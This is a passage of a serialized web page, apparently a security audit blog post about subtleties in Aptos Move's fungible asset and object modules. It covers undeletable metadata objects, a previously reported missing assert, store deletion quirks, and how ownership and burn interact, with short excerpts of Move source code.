",{"type":28,"tag":87,"props":62461,"children":62464},{"href":62462,"rel":62463},"https://github.com/aptos-foundation/AIPs/blob/main/aips/aip-10.md",[91],[62465],{"type":33,"value":62466},"AIP-10",{"type":33,"value":141},{"type":28,"tag":107,"props":62469,"children":62470},{},[62471],{"type":28,"tag":29,"props":62472,"children":62473},{},[62474,62478],{"type":28,"tag":116,"props":62475,"children":62476},{},[62477],{"type":33,"value":61069},{"type":33,"value":62479}," proposes a standard for Fungible Assets (FA) using Move Objects. In this model, any on-chain asset represented as an object can also be expressed as a fungible asset allowing for a single object to be represented by many distinct, yet interchangeable units of ownership.",{"type":28,"tag":29,"props":62481,"children":62482},{},[62483],{"type":33,"value":62484},"These two modules are closely intertwined, and their connection can be surprisingly intricate.",{"type":28,"tag":75,"props":62486,"children":62488},{"id":62487},"creation-and-deletion",[62489],{"type":33,"value":62490},"Creation and deletion",{"type":28,"tag":29,"props":62492,"children":62493},{},[62494,62496,62502],{"type":33,"value":62495},"To create a fungible resource, an undeletable object must first be created. \"Undeletable\" means, that it's not possible to get a permission to delete it. This is verified in ",{"type":28,"tag":98,"props":62497,"children":62499},{"className":62498},[],[62500],{"type":33,"value":62501},"fungible_asset::add_fungibility",{"type":33,"value":4160},{"type":28,"tag":234,"props":62504,"children":62506},{"className":2652,"code":62505,"language":2651,"meta":7,"style":7},"assert!(!object::can_generate_delete_ref(constructor_ref), error::invalid_argument(EOBJECT_IS_DELETABLE));\n",[62507],{"type":28,"tag":98,"props":62508,"children":62509},{"__ignoreMap":7},[62510],{"type":28,"tag":116,"props":62511,"children":62512},{"class":245,"line":246},[62513,62517,62521,62525,62530,62534,62539,62543,62548,62553,62557,62561],{"type":28,"tag":116,"props":62514,"children":62515},{"style":282},[62516],{"type":33,"value":41605},{"type":28,"tag":116,"props":62518,"children":62519},{"style":266},[62520],{"type":33,"value":313},{"type":28,"tag":116,"props":62522,"children":62523},{"style":370},[62524],{"type":33,"value":20285},{"type":28,"tag":116,"props":62526,"children":62527},{"style":266},[62528],{"type":33,"value":62529},"object",{"type":28,"tag":116,"props":62531,"children":62532},{"style":370},[62533],{"type":33,"value":3151},{"type":28,"tag":116,"props":62535,"children":62536},{"style":282},[62537],{"type":33,"value":62538},"can_generate_delete_ref",{"type":28,"tag":116,"props":62540,"children":62541},{"style":266},[62542],{"type":33,"value":313},{"type":28,"tag":116,"props":62544,"children":62545},{"style":272},[62546],{"type":33,"value":62547},"constructor_ref",{"type":28,"tag":116,"props":62549,"children":62550},{"style":266},[62551],{"type":33,"value":62552},"), error",{"type":28,"tag":116,"props":62554,"children":62555},{"style":370},[62556],{"type":33,"value":3151},{"type":28,"tag":116,"props":62558,"children":62559},{"style":282},[62560],{"type":33,"value":61993},{"type":28,"tag":116,"props":62562,"children":62563},{"style":266},[62564],{"type":33,"value":62565},"(EOBJECT_IS_DELETABLE));\n",{"type":28,"tag":29,"props":62567,"children":62568},{},[62569,62571,62576,62578,62583,62584,62591],{"type":33,"value":62570},"This object serves as the foundation for ownership tokens in the form of a ",{"type":28,"tag":98,"props":62572,"children":62574},{"className":62573},[],[62575],{"type":33,"value":61130},{"type":33,"value":62577},". This means that allowing it to be deletable wouldn't make sense and would impact the usability of such fungible assets, restricting users from accessing critical functionalities such as creating new stores. In the past the ",{"type":28,"tag":98,"props":62579,"children":62581},{"className":62580},[],[62582],{"type":33,"value":62501},{"type":33,"value":6129},{"type":28,"tag":87,"props":62585,"children":62588},{"href":62586,"rel":62587},"https://github.com/aptos-labs/aptos-core/commit/6976f8e9004b0f6ebb6fd976410d695c5a5a7ace",[91],[62589],{"type":33,"value":62590},"lacked this assert",{"type":33,"value":62592},", which we discovered and reported.",{"type":28,"tag":29,"props":62594,"children":62595},{},[62596,62601,62603,62608,62610,62615],{"type":28,"tag":98,"props":62597,"children":62599},{"className":62598},[],[62600],{"type":33,"value":62501},{"type":33,"value":62602}," transfers the ",{"type":28,"tag":98,"props":62604,"children":62606},{"className":62605},[],[62607],{"type":33,"value":61189},{"type":33,"value":62609}," and associated resources to this new object. After that, with the appropriate permissions, the ",{"type":28,"tag":98,"props":62611,"children":62613},{"className":62612},[],[62614],{"type":33,"value":61130},{"type":33,"value":62616}," can be minted, representing a share of ownership in that object.",{"type":28,"tag":234,"props":62618,"children":62620},{"className":2652,"code":62619,"language":2651,"meta":7,"style":7},"/// Make an existing object fungible by adding the Metadata resource.\npublic fun add_fungibility(\n    [...]\n): Object\u003CMetadata> {\n    [...]\n    move_to(metadata_object_signer,\n        Metadata {\n            name,\n            symbol,\n            decimals,\n            icon_uri,\n            project_uri,\n        }\n    );\n[...]\n}\n",[62621],{"type":28,"tag":98,"props":62622,"children":62623},{"__ignoreMap":7},[62624,62632,62652,62667,62694,62709,62730,62742,62754,62766,62778,62790,62802,62809,62816,62831],{"type":28,"tag":116,"props":62625,"children":62626},{"class":245,"line":246},[62627],{"type":28,"tag":116,"props":62628,"children":62629},{"style":250},[62630],{"type":33,"value":62631},"/// Make an existing object fungible by adding the Metadata resource.\n",{"type":28,"tag":116,"props":62633,"children":62634},{"class":245,"line":256},[62635,62639,62643,62648],{"type":28,"tag":116,"props":62636,"children":62637},{"style":272},[62638],{"type":33,"value":61294},{"type":28,"tag":116,"props":62640,"children":62641},{"style":272},[62642],{"type":33,"value":5878},{"type":28,"tag":116,"props":62644,"children":62645},{"style":282},[62646],{"type":33,"value":62647}," add_fungibility",{"type":28,"tag":116,"props":62649,"children":62650},{"style":266},[62651],{"type":33,"value":3133},{"type":28,"tag":116,"props":62653,"children":62654},{"class":245,"line":293},[62655,62659,62663],{"type":28,"tag":116,"props":62656,"children":62657},{"style":266},[62658],{"type":33,"value":62337},{"type":28,"tag":116,"props":62660,"children":62661},{"style":370},[62662],{"type":33,"value":9259},{"type":28,"tag":116,"props":62664,"children":62665},{"style":266},[62666],{"type":33,"value":11440},{"type":28,"tag":116,"props":62668,"children":62669},{"class":245,"line":361},[62670,62674,62678,62682,62686,62690],{"type":28,"tag":116,"props":62671,"children":62672},{"style":266},[62673],{"type":33,"value":1829},{"type":28,"tag":116,"props":62675,"children":62676},{"style":370},[62677],{"type":33,"value":4160},{"type":28,"tag":116,"props":62679,"children":62680},{"style":339},[62681],{"type":33,"value":61180},{"type":28,"tag":116,"props":62683,"children":62684},{"style":266},[62685],{"type":33,"value":514},{"type":28,"tag":116,"props":62687,"children":62688},{"style":339},[62689],{"type":33,"value":61189},{"type":28,"tag":116,"props":62691,"children":62692},{"style":266},[62693],{"type":33,"value":6952},{"type":28,"tag":116,"props":62695,"children":62696},{"class":245,"line":387},[62697,62701,62705],{"type":28,"tag":116,"props":62698,"children":62699},{"style":266},[62700],{"type":33,"value":62337},{"type":28,"tag":116,"props":62702,"children":62703},{"style":370},[62704],{"type":33,"value":9259},{"type":28,"tag":116,"props":62706,"children":62707},{"style":266},[62708],{"type":33,"value":11440},{"type":28,"tag":116,"props":62710,"children":62711},{"class":245,"line":400},[62712,62717,62721,62726],{"type":28,"tag":116,"props":62713,"children":62714},{"style":282},[62715],{"type":33,"value":62716},"    move_to",{"type":28,"tag":116,"props":62718,"children":62719},{"style":266},[62720],{"type":33,"value":313},{"type":28,"tag":116,"props":62722,"children":62723},{"style":272},[62724],{"type":33,"value":62725},"metadata_object_signer",{"type":28,"tag":116,"props":62727,"children":62728},{"style":266},[62729],{"type":33,"value":3178},{"type":28,"tag":116,"props":62731,"children":62732},{"class":245,"line":614},[62733,62738],{"type":28,"tag":116,"props":62734,"children":62735},{"style":339},[62736],{"type":33,"value":62737},"        Metadata",{"type":28,"tag":116,"props":62739,"children":62740},{"style":266},[62741],{"type":33,"value":1291},{"type":28,"tag":116,"props":62743,"children":62744},{"class":245,"line":631},[62745,62750],{"type":28,"tag":116,"props":62746,"children":62747},{"style":272},[62748],{"type":33,"value":62749},"            name",{"type":28,"tag":116,"props":62751,"children":62752},{"style":266},[62753],{"type":33,"value":3178},{"type":28,"tag":116,"props":62755,"children":62756},{"class":245,"line":665},[62757,62762],{"type":28,"tag":116,"props":62758,"children":62759},{"style":272},[62760],{"type":33,"value":62761},"            symbol",{"type":28,"tag":116,"props":62763,"children":62764},{"style":266},[62765],{"type":33,"value":3178},{"type":28,"tag":116,"props":62767,"children":62768},{"class":245,"line":713},[62769,62774],{"type":28,"tag":116,"props":62770,"children":62771},{"style":272},[62772],{"type":33,"value":62773},"            decimals",{"type":28,"tag":116,"props":62775,"children":62776},{"style":266},[62777],{"type":33,"value":3178},{"type":28,"tag":116,"props":62779,"children":62780},{"class":245,"line":750},[62781,62786],{"type":28,"tag":116,"props":62782,"children":62783},{"style":272},[62784],{"type":33,"value":62785},"            icon_uri",{"type":28,"tag":116,"props":62787,"children":62788},{"style":266},[62789],{"type":33,"value":3178},{"type":28,"tag":116,"props":62791,"children":62792},{"class":245,"line":779},[62793,62798],{"type":28,"tag":116,"props":62794,"children":62795},{"style":272},[62796],{"type":33,"value":62797},"            project_uri",{"type":28,"tag":116,"props":62799,"children":62800},{"style":266},[62801],{"type":33,"value":3178},{"type":28,"tag":116,"props":62803,"children":62804},{"class":245,"line":796},[62805],{"type":28,"tag":116,"props":62806,"children":62807},{"style":266},[62808],{"type":33,"value":1954},{"type":28,"tag":116,"props":62810,"children":62811},{"class":245,"line":847},[62812],{"type":28,"tag":116,"props":62813,"children":62814},{"style":266},[62815],{"type":33,"value":43279},{"type":28,"tag":116,"props":62817,"children":62818},{"class":245,"line":898},[62819,62823,62827],{"type":28,"tag":116,"props":62820,"children":62821},{"style":266},[62822],{"type":33,"value":347},{"type":28,"tag":116,"props":62824,"children":62825},{"style":370},[62826],{"type":33,"value":9259},{"type":28,"tag":116,"props":62828,"children":62829},{"style":266},[62830],{"type":33,"value":11440},{"type":28,"tag":116,"props":62832,"children":62833},{"class":245,"line":907},[62834],{"type":28,"tag":116,"props":62835,"children":62836},{"style":266},[62837],{"type":33,"value":406},{"type":28,"tag":18457,"props":62839,"children":62840},{},[],{"type":28,"tag":29,"props":62842,"children":62843},{},[62844,62846,62851,62853,62858],{"type":33,"value":62845},"Deletions can be a big issue even when dealing with objects that are eligible for deletion. For example, a ",{"type":28,"tag":98,"props":62847,"children":62849},{"className":62848},[],[62850],{"type":33,"value":61695},{"type":33,"value":62852}," is also an object, and a \"secondary\" ",{"type":28,"tag":98,"props":62854,"children":62856},{"className":62855},[],[62857],{"type":33,"value":61695},{"type":33,"value":62859}," can be created as deletable if empty. The catch is that deletion can occur both at the fungible asset level and at the object level.",{"type":28,"tag":234,"props":62861,"children":62863},{"className":2652,"code":62862,"language":2651,"meta":7,"style":7},"//Fungible asset\npublic fun remove_store(delete_ref: &DeleteRef)\n\n//Object\npublic fun delete(ref: DeleteRef)\n",[62864],{"type":28,"tag":98,"props":62865,"children":62866},{"__ignoreMap":7},[62867,62875,62917,62924,62932],{"type":28,"tag":116,"props":62868,"children":62869},{"class":245,"line":246},[62870],{"type":28,"tag":116,"props":62871,"children":62872},{"style":250},[62873],{"type":33,"value":62874},"//Fungible asset\n",{"type":28,"tag":116,"props":62876,"children":62877},{"class":245,"line":256},[62878,62882,62886,62891,62895,62900,62904,62908,62913],{"type":28,"tag":116,"props":62879,"children":62880},{"style":272},[62881],{"type":33,"value":61294},{"type":28,"tag":116,"props":62883,"children":62884},{"style":272},[62885],{"type":33,"value":5878},{"type":28,"tag":116,"props":62887,"children":62888},{"style":282},[62889],{"type":33,"value":62890}," remove_store",{"type":28,"tag":116,"props":62892,"children":62893},{"style":266},[62894],{"type":33,"value":313},{"type":28,"tag":116,"props":62896,"children":62897},{"style":272},[62898],{"type":33,"value":62899},"delete_ref",{"type":28,"tag":116,"props":62901,"children":62902},{"style":370},[62903],{"type":33,"value":4160},{"type":28,"tag":116,"props":62905,"children":62906},{"style":370},[62907],{"type":33,"value":6813},{"type":28,"tag":116,"props":62909,"children":62910},{"style":339},[62911],{"type":33,"value":62912},"DeleteRef",{"type":28,"tag":116,"props":62914,"children":62915},{"style":266},[62916],{"type":33,"value":2830},{"type":28,"tag":116,"props":62918,"children":62919},{"class":245,"line":293},[62920],{"type":28,"tag":116,"props":62921,"children":62922},{"emptyLinePlaceholder":19},[62923],{"type":33,"value":1044},{"type":28,"tag":116,"props":62925,"children":62926},{"class":245,"line":361},[62927],{"type":28,"tag":116,"props":62928,"children":62929},{"style":250},[62930],{"type":33,"value":62931},"//Object\n",{"type":28,"tag":116,"props":62933,"children":62934},{"class":245,"line":387},[62935,62939,62943,62948,62952,62957,62961,62966],{"type":28,"tag":116,"props":62936,"children":62937},{"style":272},[62938],{"type":33,"value":61294},{"type":28,"tag":116,"props":62940,"children":62941},{"style":272},[62942],{"type":33,"value":5878},{"type":28,"tag":116,"props":62944,"children":62945},{"style":282},[62946],{"type":33,"value":62947}," delete",{"type":28,"tag":116,"props":62949,"children":62950},{"style":266},[62951],{"type":33,"value":313},{"type":28,"tag":116,"props":62953,"children":62954},{"style":376},[62955],{"type":33,"value":62956},"ref",{"type":28,"tag":116,"props":62958,"children":62959},{"style":370},[62960],{"type":33,"value":4160},{"type":28,"tag":116,"props":62962,"children":62963},{"style":339},[62964],{"type":33,"value":62965}," DeleteRef",{"type":28,"tag":116,"props":62967,"children":62968},{"style":266},[62969],{"type":33,"value":2830},{"type":28,"tag":29,"props":62971,"children":62972},{},[62973,62975,62981,62983,62988,62990,62995,62997,63002,63004,63010,63012,63018,63020,63025],{"type":33,"value":62974},"When ",{"type":28,"tag":98,"props":62976,"children":62978},{"className":62977},[],[62979],{"type":33,"value":62980},"object::delete",{"type":33,"value":62982}," removes the ",{"type":28,"tag":98,"props":62984,"children":62986},{"className":62985},[],[62987],{"type":33,"value":48472},{"type":33,"value":62989}," from a ",{"type":28,"tag":98,"props":62991,"children":62993},{"className":62992},[],[62994],{"type":33,"value":61695},{"type":33,"value":62996}," object, the ",{"type":28,"tag":98,"props":62998,"children":63000},{"className":62999},[],[63001],{"type":33,"value":61695},{"type":33,"value":63003}," resource becomes permanently undeletable. This is because ",{"type":28,"tag":98,"props":63005,"children":63007},{"className":63006},[],[63008],{"type":33,"value":63009},"remove_store",{"type":33,"value":63011}," can't create an ",{"type":28,"tag":98,"props":63013,"children":63015},{"className":63014},[],[63016],{"type":33,"value":63017},"Object\u003CFungibleStore>",{"type":33,"value":63019}," without an ",{"type":28,"tag":98,"props":63021,"children":63023},{"className":63022},[],[63024],{"type":33,"value":48472},{"type":33,"value":63026}," underneath, causing the operation to fail.",{"type":28,"tag":234,"props":63028,"children":63030},{"className":2652,"code":63029,"language":2651,"meta":7,"style":7},"public fun remove_store(delete_ref: &DeleteRef) acquires [...] {\n    let store = &object::object_from_delete_ref\u003CFungibleStore>(delete_ref);\n    [...]\n}\n",[63031],{"type":28,"tag":98,"props":63032,"children":63033},{"__ignoreMap":7},[63034,63089,63141,63156],{"type":28,"tag":116,"props":63035,"children":63036},{"class":245,"line":246},[63037,63041,63045,63049,63053,63057,63061,63065,63069,63073,63077,63081,63085],{"type":28,"tag":116,"props":63038,"children":63039},{"style":272},[63040],{"type":33,"value":61294},{"type":28,"tag":116,"props":63042,"children":63043},{"style":272},[63044],{"type":33,"value":5878},{"type":28,"tag":116,"props":63046,"children":63047},{"style":282},[63048],{"type":33,"value":62890},{"type":28,"tag":116,"props":63050,"children":63051},{"style":266},[63052],{"type":33,"value":313},{"type":28,"tag":116,"props":63054,"children":63055},{"style":272},[63056],{"type":33,"value":62899},{"type":28,"tag":116,"props":63058,"children":63059},{"style":370},[63060],{"type":33,"value":4160},{"type":28,"tag":116,"props":63062,"children":63063},{"style":370},[63064],{"type":33,"value":6813},{"type":28,"tag":116,"props":63066,"children":63067},{"style":339},[63068],{"type":33,"value":62912},{"type":28,"tag":116,"props":63070,"children":63071},{"style":266},[63072],{"type":33,"value":1609},{"type":28,"tag":116,"props":63074,"children":63075},{"style":272},[63076],{"type":33,"value":6015},{"type":28,"tag":116,"props":63078,"children":63079},{"style":266},[63080],{"type":33,"value":22695},{"type":28,"tag":116,"props":63082,"children":63083},{"style":370},[63084],{"type":33,"value":9259},{"type":28,"tag":116,"props":63086,"children":63087},{"style":266},[63088],{"type":33,"value":61385},{"type":28,"tag":116,"props":63090,"children":63091},{"class":245,"line":256},[63092,63096,63100,63104,63108,63112,63116,63121,63125,63129,63133,63137],{"type":28,"tag":116,"props":63093,"children":63094},{"style":376},[63095],{"type":33,"value":2672},{"type":28,"tag":116,"props":63097,"children":63098},{"style":272},[63099],{"type":33,"value":5502},{"type":28,"tag":116,"props":63101,"children":63102},{"style":370},[63103],{"type":33,"value":2226},{"type":28,"tag":116,"props":63105,"children":63106},{"style":370},[63107],{"type":33,"value":6813},{"type":28,"tag":116,"props":63109,"children":63110},{"style":266},[63111],{"type":33,"value":62529},{"type":28,"tag":116,"props":63113,"children":63114},{"style":370},[63115],{"type":33,"value":3151},{"type":28,"tag":116,"props":63117,"children":63118},{"style":272},[63119],{"type":33,"value":63120},"object_from_delete_ref",{"type":28,"tag":116,"props":63122,"children":63123},{"style":266},[63124],{"type":33,"value":514},{"type":28,"tag":116,"props":63126,"children":63127},{"style":339},[63128],{"type":33,"value":61695},{"type":28,"tag":116,"props":63130,"children":63131},{"style":266},[63132],{"type":33,"value":7282},{"type":28,"tag":116,"props":63134,"children":63135},{"style":272},[63136],{"type":33,"value":62899},{"type":28,"tag":116,"props":63138,"children":63139},{"style":266},[63140],{"type":33,"value":895},{"type":28,"tag":116,"props":63142,"children":63143},{"class":245,"line":293},[63144,63148,63152],{"type":28,"tag":116,"props":63145,"children":63146},{"style":266},[63147],{"type":33,"value":62337},{"type":28,"tag":116,"props":63149,"children":63150},{"style":370},[63151],{"type":33,"value":9259},{"type":28,"tag":116,"props":63153,"children":63154},{"style":266},[63155],{"type":33,"value":11440},{"type":28,"tag":116,"props":63157,"children":63158},{"class":245,"line":361},[63159],{"type":28,"tag":116,"props":63160,"children":63161},{"style":266},[63162],{"type":33,"value":406},{"type":28,"tag":29,"props":63164,"children":63165},{},[63166,63168,63173,63175,63181,63183,63188],{"type":33,"value":63167},"In addition, such \"deleted\" ",{"type":28,"tag":98,"props":63169,"children":63171},{"className":63170},[],[63172],{"type":33,"value":61695},{"type":33,"value":63174}," objects remain at least partially operable. For instance, ",{"type":28,"tag":98,"props":63176,"children":63178},{"className":63177},[],[63179],{"type":33,"value":63180},"fungible_asset::deposit",{"type":33,"value":63182}," does not check the ",{"type":28,"tag":98,"props":63184,"children":63186},{"className":63185},[],[63187],{"type":33,"value":48472},{"type":33,"value":63189}," existence.",{"type":28,"tag":75,"props":63191,"children":63193},{"id":63192},"ownership",[63194],{"type":33,"value":63195},"Ownership",{"type":28,"tag":29,"props":63197,"children":63198},{},[63199,63201,63206,63208,63214,63216,63221],{"type":33,"value":63200},"Each object has an owner. Fungible assets rely on the ",{"type":28,"tag":98,"props":63202,"children":63204},{"className":63203},[],[63205],{"type":33,"value":48472},{"type":33,"value":63207}," ownership model. For example, during a withdrawal operation, the signer is validated using ",{"type":28,"tag":98,"props":63209,"children":63211},{"className":63210},[],[63212],{"type":33,"value":63213},"object::owns",{"type":33,"value":63215}," to confirm ownership of the ",{"type":28,"tag":98,"props":63217,"children":63219},{"className":63218},[],[63220],{"type":33,"value":61695},{"type":33,"value":49796},{"type":28,"tag":234,"props":63223,"children":63225},{"className":2652,"code":63224,"language":2651,"meta":7,"style":7},"public(friend) fun withdraw_sanity_check\u003CT: key>(\n    owner: &signer,\n    store: Object\u003CT>,\n    abort_on_dispatch: bool,\n) acquires FungibleStore, DispatchFunctionStore {\n    assert!(object::owns(store, signer::address_of(owner)), error::permission_denied(ENOT_STORE_OWNER));\n    [...]\n}\n",[63226],{"type":28,"tag":98,"props":63227,"children":63228},{"__ignoreMap":7},[63229,63277,63301,63328,63348,63376,63444,63459],{"type":28,"tag":116,"props":63230,"children":63231},{"class":245,"line":246},[63232,63236,63240,63244,63248,63252,63257,63261,63265,63269,63273],{"type":28,"tag":116,"props":63233,"children":63234},{"style":282},[63235],{"type":33,"value":61294},{"type":28,"tag":116,"props":63237,"children":63238},{"style":266},[63239],{"type":33,"value":313},{"type":28,"tag":116,"props":63241,"children":63242},{"style":272},[63243],{"type":33,"value":6770},{"type":28,"tag":116,"props":63245,"children":63246},{"style":266},[63247],{"type":33,"value":1609},{"type":28,"tag":116,"props":63249,"children":63250},{"style":272},[63251],{"type":33,"value":6779},{"type":28,"tag":116,"props":63253,"children":63254},{"style":272},[63255],{"type":33,"value":63256}," withdraw_sanity_check",{"type":28,"tag":116,"props":63258,"children":63259},{"style":266},[63260],{"type":33,"value":514},{"type":28,"tag":116,"props":63262,"children":63263},{"style":339},[63264],{"type":33,"value":5659},{"type":28,"tag":116,"props":63266,"children":63267},{"style":370},[63268],{"type":33,"value":4160},{"type":28,"tag":116,"props":63270,"children":63271},{"style":272},[63272],{"type":33,"value":5603},{"type":28,"tag":116,"props":63274,"children":63275},{"style":266},[63276],{"type":33,"value":6260},{"type":28,"tag":116,"props":63278,"children":63279},{"class":245,"line":256},[63280,63285,63289,63293,63297],{"type":28,"tag":116,"props":63281,"children":63282},{"style":272},[63283],{"type":33,"value":63284},"    owner",{"type":28,"tag":116,"props":63286,"children":63287},{"style":370},[63288],{"type":33,"value":4160},{"type":28,"tag":116,"props":63290,"children":63291},{"style":370},[63292],{"type":33,"value":6813},{"type":28,"tag":116,"props":63294,"children":63295},{"style":272},[63296],{"type":33,"value":6818},{"type":28,"tag":116,"props":63298,"children":63299},{"style":266},[63300],{"type":33,"value":3178},{"type":28,"tag":116,"props":63302,"children":63303},{"class":245,"line":293},[63304,63308,63312,63316,63320,63324],{"type":28,"tag":116,"props":63305,"children":63306},{"style":272},[63307],{"type":33,"value":29069},{"type":28,"tag":116,"props":63309,"children":63310},{"style":370},[63311],{"type":33,"value":4160},{"type":28,"tag":116,"props":63313,"children":63314},{"style":339},[63315],{"type":33,"value":61180},{"type":28,"tag":116,"props":63317,"children":63318},{"style":266},[63319],{"type":33,"value":514},{"type":28,"tag":116,"props":63321,"children":63322},{"style":339},[63323],{"type":33,"value":5659},{"type":28,"tag":116,"props":63325,"children":63326},{"style":266},[63327],{"type":33,"value":5809},{"type":28,"tag":116,"props":63329,"children":63330},{"class":245,"line":361},[63331,63336,63340,63344],{"type":28,"tag":116,"props":63332,"children":63333},{"style":272},[63334],{"type":33,"value":63335},"    abort_on_dispatch",{"type":28,"tag":116,"props":63337,"children":63338},{"style":370},[63339],{"type":33,"value":4160},{"type":28,"tag":116,"props":63341,"children":63342},{"style":339},[63343],{"type":33,"value":11718},{"type":28,"tag":116,"props":63345,"children":63346},{"style":266},[63347],{"type":33,"value":3178},{"type":28,"tag":116,"props":63349,"children":63350},{"class":245,"line":387},[63351,63355,63359,63363,63367,63372],{"type":28,"tag":116,"props":63352,"children":63353},{"style":266},[63354],{"type":33,"value":1609},{"type":28,"tag":116,"props":63356,"children":63357},{"style":272},[63358],{"type":33,"value":6015},{"type":28,"tag":116,"props":63360,"children":63361},{"style":339},[63362],{"type":33,"value":61715},{"type":28,"tag":116,"props":63364,"children":63365},{"style":266},[63366],{"type":33,"value":825},{"type":28,"tag":116,"props":63368,"children":63369},{"style":339},[63370],{"type":33,"value":63371},"DispatchFunctionStore",{"type":28,"tag":116,"props":63373,"children":63374},{"style":266},[63375],{"type":33,"value":1291},{"type":28,"tag":116,"props":63377,"children":63378},{"class":245,"line":400},[63379,63383,63388,63392,63397,63401,63405,63409,63413,63417,63421,63425,63430,63434,63439],{"type":28,"tag":116,"props":63380,"children":63381},{"style":282},[63382],{"type":33,"value":61963},{"type":28,"tag":116,"props":63384,"children":63385},{"style":266},[63386],{"type":33,"value":63387},"(object",{"type":28,"tag":116,"props":63389,"children":63390},{"style":370},[63391],{"type":33,"value":3151},{"type":28,"tag":116,"props":63393,"children":63394},{"style":282},[63395],{"type":33,"value":63396},"owns",{"type":28,"tag":116,"props":63398,"children":63399},{"style":266},[63400],{"type":33,"value":313},{"type":28,"tag":116,"props":63402,"children":63403},{"style":272},[63404],{"type":33,"value":5612},{"type":28,"tag":116,"props":63406,"children":63407},{"style":266},[63408],{"type":33,"value":12602},{"type":28,"tag":116,"props":63410,"children":63411},{"style":370},[63412],{"type":33,"value":3151},{"type":28,"tag":116,"props":63414,"children":63415},{"style":282},[63416],{"type":33,"value":6881},{"type":28,"tag":116,"props":63418,"children":63419},{"style":266},[63420],{"type":33,"value":313},{"type":28,"tag":116,"props":63422,"children":63423},{"style":272},[63424],{"type":33,"value":15271},{"type":28,"tag":116,"props":63426,"children":63427},{"style":266},[63428],{"type":33,"value":63429},")), error",{"type":28,"tag":116,"props":63431,"children":63432},{"style":370},[63433],{"type":33,"value":3151},{"type":28,"tag":116,"props":63435,"children":63436},{"style":282},[63437],{"type":33,"value":63438},"permission_denied",{"type":28,"tag":116,"props":63440,"children":63441},{"style":266},[63442],{"type":33,"value":63443},"(ENOT_STORE_OWNER));\n",{"type":28,"tag":116,"props":63445,"children":63446},{"class":245,"line":614},[63447,63451,63455],{"type":28,"tag":116,"props":63448,"children":63449},{"style":266},[63450],{"type":33,"value":62337},{"type":28,"tag":116,"props":63452,"children":63453},{"style":370},[63454],{"type":33,"value":9259},{"type":28,"tag":116,"props":63456,"children":63457},{"style":266},[63458],{"type":33,"value":11440},{"type":28,"tag":116,"props":63460,"children":63461},{"class":245,"line":631},[63462],{"type":28,"tag":116,"props":63463,"children":63464},{"style":266},[63465],{"type":33,"value":406},{"type":28,"tag":29,"props":63467,"children":63468},{},[63469,63471,63476,63478,63484,63486,63492],{"type":33,"value":63470},"The thing to note is that defining ownership with ",{"type":28,"tag":98,"props":63472,"children":63474},{"className":63473},[],[63475],{"type":33,"value":63213},{"type":33,"value":63477}," can be tricky. The ",{"type":28,"tag":98,"props":63479,"children":63481},{"className":63480},[],[63482],{"type":33,"value":63483},"burn",{"type":33,"value":63485}," function was one of the reasons behind that. It allowed changing the object's owner to the ",{"type":28,"tag":98,"props":63487,"children":63489},{"className":63488},[],[63490],{"type":33,"value":63491},"BURN_ADDRESS",{"type":33,"value":63493}," while bypassing transfer restrictions:",{"type":28,"tag":234,"props":63495,"children":63497},{"className":2652,"code":63496,"language":2651,"meta":7,"style":7},"public entry fun burn\u003CT: key>(owner: &signer, object: Object\u003CT>) acquires ObjectCore {\n    let original_owner = signer::address_of(owner);\n    assert!(is_owner(object, original_owner), error::permission_denied(ENOT_OBJECT_OWNER));\n    let object_addr = object.inner;\n    move_to(&create_signer(object_addr), TombStone { original_owner });\n    transfer_raw_inner(object_addr, BURN_ADDRESS);\n}\n",[63498],{"type":28,"tag":98,"props":63499,"children":63500},{"__ignoreMap":7},[63501,63598,63639,63689,63718,63768,63789],{"type":28,"tag":116,"props":63502,"children":63503},{"class":245,"line":246},[63504,63508,63512,63516,63521,63525,63529,63533,63537,63541,63545,63549,63553,63557,63561,63565,63569,63573,63577,63581,63585,63589,63594],{"type":28,"tag":116,"props":63505,"children":63506},{"style":272},[63507],{"type":33,"value":61294},{"type":28,"tag":116,"props":63509,"children":63510},{"style":272},[63511],{"type":33,"value":62261},{"type":28,"tag":116,"props":63513,"children":63514},{"style":272},[63515],{"type":33,"value":5878},{"type":28,"tag":116,"props":63517,"children":63518},{"style":272},[63519],{"type":33,"value":63520}," burn",{"type":28,"tag":116,"props":63522,"children":63523},{"style":266},[63524],{"type":33,"value":514},{"type":28,"tag":116,"props":63526,"children":63527},{"style":339},[63528],{"type":33,"value":5659},{"type":28,"tag":116,"props":63530,"children":63531},{"style":370},[63532],{"type":33,"value":4160},{"type":28,"tag":116,"props":63534,"children":63535},{"style":272},[63536],{"type":33,"value":5603},{"type":28,"tag":116,"props":63538,"children":63539},{"style":266},[63540],{"type":33,"value":7282},{"type":28,"tag":116,"props":63542,"children":63543},{"style":272},[63544],{"type":33,"value":15271},{"type":28,"tag":116,"props":63546,"children":63547},{"style":370},[63548],{"type":33,"value":4160},{"type":28,"tag":116,"props":63550,"children":63551},{"style":370},[63552],{"type":33,"value":6813},{"type":28,"tag":116,"props":63554,"children":63555},{"style":272},[63556],{"type":33,"value":6818},{"type":28,"tag":116,"props":63558,"children":63559},{"style":266},[63560],{"type":33,"value":825},{"type":28,"tag":116,"props":63562,"children":63563},{"style":272},[63564],{"type":33,"value":62529},{"type":28,"tag":116,"props":63566,"children":63567},{"style":370},[63568],{"type":33,"value":4160},{"type":28,"tag":116,"props":63570,"children":63571},{"style":339},[63572],{"type":33,"value":61180},{"type":28,"tag":116,"props":63574,"children":63575},{"style":266},[63576],{"type":33,"value":514},{"type":28,"tag":116,"props":63578,"children":63579},{"style":339},[63580],{"type":33,"value":5659},{"type":28,"tag":116,"props":63582,"children":63583},{"style":266},[63584],{"type":33,"value":20110},{"type":28,"tag":116,"props":63586,"children":63587},{"style":272},[63588],{"type":33,"value":6015},{"type":28,"tag":116,"props":63590,"children":63591},{"style":339},[63592],{"type":33,"value":63593}," ObjectCore",{"type":28,"tag":116,"props":63595,"children":63596},{"style":266},[63597],{"type":33,"value":1291},{"type":28,"tag":116,"props":63599,"children":63600},{"class":245,"line":256},[63601,63605,63610,63614,63619,63623,63627,63631,63635],{"type":28,"tag":116,"props":63602,"children":63603},{"style":376},[63604],{"type":33,"value":2672},{"type":28,"tag":116,"props":63606,"children":63607},{"style":272},[63608],{"type":33,"value":63609}," original_owner",{"type":28,"tag":116,"props":63611,"children":63612},{"style":370},[63613],{"type":33,"value":2226},{"type":28,"tag":116,"props":63615,"children":63616},{"style":266},[63617],{"type":33,"value":63618}," 